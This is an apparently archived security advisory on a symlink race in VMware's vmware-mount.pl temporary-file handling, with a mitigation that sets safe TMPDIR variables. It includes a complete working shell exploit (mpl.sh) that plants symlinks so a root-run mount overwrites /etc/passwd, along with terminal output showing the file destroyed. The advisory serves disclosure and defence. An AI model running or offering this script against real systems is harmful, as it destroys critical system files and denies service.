COMMAND
VMware
SYSTEMS AFFECTED
VMware
PROBLEM
Paul Starzetz found following. There is symlink vulnerability in
the vmware-mount.pl script which comes with lates VMware.
While mounting virtual disk drives using the vmware-mount.pl
script, a temporary file named vmware-mount.pl.PID where PID is
the current pid of the command will be created in an insecure
manner. This allows an attacker to overwrite any local file, if
root mounts a VMware's virtual partition (mounting is usually done
as root).
Example:
paul@ps:/tmp > id
uid=500(paul) gid=100(users) Gruppen=100(users),90(firewall)
paul@ps:/tmp > ./mpl.sh
VMware local /etc/passwd DoS
By Ihq.
linking /etc/passwd to /tmp
[+] please wait for root to run vmware-mount.pl
After running vmware-mount.pl:
paul@ps:/tmp > id
uid=500 gid=100(users) Gruppen=100(users),90(firewall)
Obviously the passwd file has been overwritten:
paul@ps:/tmp > cat /etc/passwd
Nr Start Size Type Id Sytem
-- ---------- ---------- ---- -- ------------------------
1 63 2096577 BIOS C Win95 FAT32 (LBA)
mpl.sh:
#/bin/bash
declare -i n
declare -i mx
n=2
mx=32767
echo
echo "VMware local /etc/passwd DoS"
echo "By Ihq."
echo
echo " linking /etc/passwd to /tmp"
while test $n -lt $mx ; do
ln -s /etc/passwd /tmp/vmware-mount.pl.$n
n=$(($n + 1))
done
echo "[+] please wait for root to run vmware-mount.pl"
echo
SOLUTION
VMWare likes to have a good, safe TMPDIR variable set:
$ grep TMP vmware-mount.pl
return defined($ENV{TMPDIR}) ? $ENV{TMPDIR} : "/tmp";
This is a simple variation on an old theme. Make sure you have
safe TMP and TMPDIR variables set at all times. If you want a
set of scripts for safely creating such dirs and setting env vars
at login time, see TMPDIR scripts at
http://www.tux.org/~peterw/